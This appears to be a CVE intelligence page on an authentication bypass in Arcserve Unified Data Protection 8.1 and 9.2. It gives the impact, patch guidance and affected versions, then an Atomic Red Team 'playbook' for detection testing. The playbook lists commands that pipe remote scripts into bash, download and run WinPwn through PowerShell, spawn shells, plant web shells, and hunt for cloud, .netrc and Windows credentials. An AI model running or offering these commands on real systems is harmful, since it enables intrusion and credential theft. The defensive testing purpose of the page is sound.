CVE-2024-0799
Overview
This vulnerability is an authentication bypass affecting Arcserve Unified Data Protection versions 8.1 and 9.2. The root cause lies in improper authentication enforcement within the edge-app-base-webui.jar component, specifically in the EdgeLoginServiceImpl.doLogin() method invoked by the wizardLogin process. This flaw allows unauthorized access by circumventing the intended login authentication mechanism.
Vulnerability Description
An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.
Impact
An attacker with network access can bypass authentication without any privileges or user interaction, gaining unauthorized access to the Arcserve UDP management interface. This can lead to full compromise of backup and recovery operations, data exposure, and potential manipulation of critical backup configurations. The vulnerability’s CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms it requires no authentication or user interaction, making remote exploitation straightforward and highly impactful in operational environments.
Solution
Arcserve has released security updates addressing this authentication bypass in UDP versions 8.1 and 9.2. Users should apply the patches as detailed in the advisory available at https://www.tenable.com/security/research/tra-2024-07. The vendor recommends upgrading to the fixed versions specified in the advisory and following any additional configuration guidance provided to ensure authentication mechanisms are properly enforced.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An authentication bypass vulnerability has been identified in specific versions of Arcserve Unified Data Protection, particularly in the edge-app-base-webui.jar file. This flaw resides within the EdgeLoginServiceImpl.doLogin() function, which is responsible for handling user authentication during the login process. The vulnerability allows an attacker to bypass the intended authentication mechanisms, potentially granting unauthorized access to sensitive data and administrative functions within the application. The flaw arises from improper validation of user credentials, which can be exploited to gain access without legitimate authentication.
Attack vectors for this vulnerability are particularly concerning due to the nature of the affected product. An attacker could exploit this flaw remotely, leveraging crafted requests to the web interface of the Unified Data Protection system. By manipulating the login process, an attacker could gain administrative privileges without needing valid credentials. This could be executed through various means, such as automated scripts or manual attempts to exploit the vulnerability. The ease of access combined with the high privileges associated with administrative accounts makes this vulnerability a prime target for malicious actors seeking to compromise data integrity and confidentiality.
The real-world impact of this vulnerability is significant, especially for organizations relying on Arcserve Unified Data Protection for their data management and backup solutions. An attacker gaining unauthorized access could manipulate backup configurations, delete critical data, or exfiltrate sensitive information. The potential for data breaches could lead to severe business risks, including regulatory penalties, loss of customer trust, and financial repercussions from remediation efforts. Furthermore, the high CVSS score of 9.8 indicates a critical level of severity, emphasizing the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this authentication bypass vulnerability, organizations should implement a multi-faceted approach. Regularly updating to the latest versions of the affected software is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their systems. Implementing robust logging and monitoring solutions can also help detect unauthorized access attempts, allowing for timely incident response. Furthermore, employing network segmentation and access controls can limit the exposure of sensitive systems, reducing the potential impact of an exploit.
In conclusion, the authentication bypass vulnerability in Arcserve Unified Data Protection poses a significant threat to organizations utilizing this software. The ability for an attacker to gain unauthorized access to critical systems can lead to severe consequences, both operationally and financially. Therefore, proactive measures, including timely updates, security assessments, and enhanced monitoring, are essential to safeguard against this and similar vulnerabilities. By prioritizing cybersecurity best practices, organizations can better protect their assets and maintain the integrity of their data management solutions.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Arcserve | Udp | 8.1 |
cpe:2.3:a:arcserve:udp:8.1:*:*:*:*:*:*:*
|
|
|
Arcserve | Udp | 9.2 |
cpe:2.3:a:arcserve:udp:9.2:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-0799 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2024-07 |